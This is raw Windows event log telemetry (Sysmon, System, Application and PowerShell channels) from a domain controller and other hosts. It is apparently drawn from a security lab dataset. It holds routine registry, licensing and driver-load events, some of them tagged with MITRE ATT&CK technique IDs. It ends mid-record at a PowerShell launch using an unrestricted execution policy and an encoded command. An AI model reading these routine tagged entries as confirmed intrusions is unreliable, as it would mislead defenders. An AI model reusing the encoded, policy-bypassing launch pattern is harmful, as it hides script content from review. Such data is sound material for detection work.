20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Operational\MaxSizeUpperDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001694Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Operational\IsolationDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001693Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Operational\EnabledDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001691Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Analytic\TypeDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001689Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Analytic\IsolationDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001688Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Analytic\EnabledDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001686Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Admin\TypeDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001684Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Admin\IsolationDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001683Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Admin\EnabledDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001681Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.196{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kerberos-Key-Distribution-Center/Performance\TypeDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001679Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.196{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kerberos-Key-Distribution-Center/Performance\IsolationDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001678Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.196{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kerberos-Key-Distribution-Center/Performance\EnabledDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001676Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.196{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kerberos-Key-Distribution-Center/Operational\TypeDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001674Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.196{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kerberos-Key-Distribution-Center/Operational\IsolationDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001673Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.196{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kerberos-Key-Distribution-Center/Operational\EnabledDWORD (0x00000000)NT AUTHORITY\SYSTEM 100304000x8000000000000023358Applicationar-win-dc55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 0 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259186)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023354Applicationar-win-dcC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 100304000x8000000000000023353Applicationar-win-255c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259186)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023352Applicationar-win-2C:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 13241300x8000000000000000851Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:36:48.678{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DNS\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x8000000000000000850Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Audit\TypeDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000849Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Audit\RetentionDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000848Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Audit\MaxSizeUpperDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000845Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Audit\IsolationDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000844Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Audit\EnabledDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x8000000000000000842Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Analytical\TypeDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x8000000000000000841Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Analytical\RetentionDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000840Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Analytical\MaxSizeUpperDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000837Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Analytical\IsolationDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000836Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:36:48.410{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DNSServer/Analytical\EnabledDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x8000000000000000259Microsoft-Windows-Sysmon/Operationalar-win-dcT1101SetValue2024-02-01 20:35:34.369{03D06954-0095-65BC-0B00-000000004503}584C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\ProductTypeDWORD (0x00000008)NT AUTHORITY\SYSTEM 614000x8000400000000000166277Systemar-win-dc0x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-0008-0000-071D-5B354E55DA01} 614000x8000400000000000166276Systemar-win-dc0x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-0007-0000-065D-56354E55DA01} 614000x8000400000000000166274Systemar-win-dc0x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-0006-0000-9D6C-4A354E55DA01} 13241300x8000000000000000618Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:35:32.230{7A09209E-0093-65BC-0B00-000000004603}584C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\ProductTypeDWORD (0x00000008)NT AUTHORITY\SYSTEM 614000x8000400000000000166407Systemar-win-20x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-0008-0000-3F11-EC334E55DA01} 614000x8000400000000000166406Systemar-win-20x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-0007-0000-61AF-E9334E55DA01} 614000x8000400000000000166405Systemar-win-20x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-0006-0000-61AF-E9334E55DA01} 614000x8000400000000000166247Systemar-win-dc0x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0005-0000-C880-FB324E55DA01} 614000x8000400000000000166246Systemar-win-dc0x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0004-0000-E128-DC324E55DA01} 614000x8000400000000000166244Systemar-win-dc0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0002-0000-9D61-BD324E55DA01} 614000x8000400000000000166243Systemar-win-dc0x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-8CC8-BA324E55DA01} 614000x8000400000000000166377Systemar-win-20x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0005-0000-3560-54324E55DA01} 614000x8000400000000000166376Systemar-win-20x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0004-0000-7A4D-41324E55DA01} 614000x8000400000000000166374Systemar-win-20x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0002-0000-C375-29324E55DA01} 614000x8000400000000000166373Systemar-win-20x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-143F-27324E55DA01} 13241300x800000000000000075Microsoft-Windows-Sysmon/OperationalEC2AMAZ-9JTOML5T1101SetValue2024-02-01 20:34:56.902{03D06954-0070-65BC-0B00-000000004403}608C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\ProductTypeDWORD (0x00000008)NT AUTHORITY\SYSTEM 614000x8000400000000000166143SystemEC2AMAZ-9JTOML50x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-0008-0000-2E9E-031F4E55DA01} 614000x8000400000000000166142SystemEC2AMAZ-9JTOML50x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-0007-0000-483B-011F4E55DA01} 614000x8000400000000000166141SystemEC2AMAZ-9JTOML50x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-0006-0000-E5D8-FE1E4E55DA01} 614000x8000400000000000166112SystemEC2AMAZ-9JTOML50x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0005-0000-0C0D-871C4E55DA01} 614000x8000400000000000166111SystemEC2AMAZ-9JTOML50x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0004-0000-98E4-601C4E55DA01} 614000x8000400000000000166109SystemEC2AMAZ-9JTOML50x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0002-0000-AABF-1B1C4E55DA01} 614000x8000400000000000166108SystemEC2AMAZ-9JTOML50x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-0492-191C4E55DA01} 13241300x800000000000000042Microsoft-Windows-Sysmon/OperationalEC2AMAZ-9JTOML5-SetValue2024-02-01 20:34:39.113{03D06954-005D-65BC-A003-000000004303}3976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\RetentionDWORD (0x00000000)EC2AMAZ-9JTOML5\Administrator 614000x8000400000000000166056SystemEC2AMAZ-9JTOML50x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-000A-0000-CCC6-210F4E55DA01} 410314106200x0154669Microsoft-Windows-PowerShell/OperationalEC2AMAZ-9JTOML5 Severity = Informational Host Name = Default Host Host Version = 5.1.14393.6343 Host ID = 010938e4-0efe-4cca-9502-8e8ee122a9e7 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 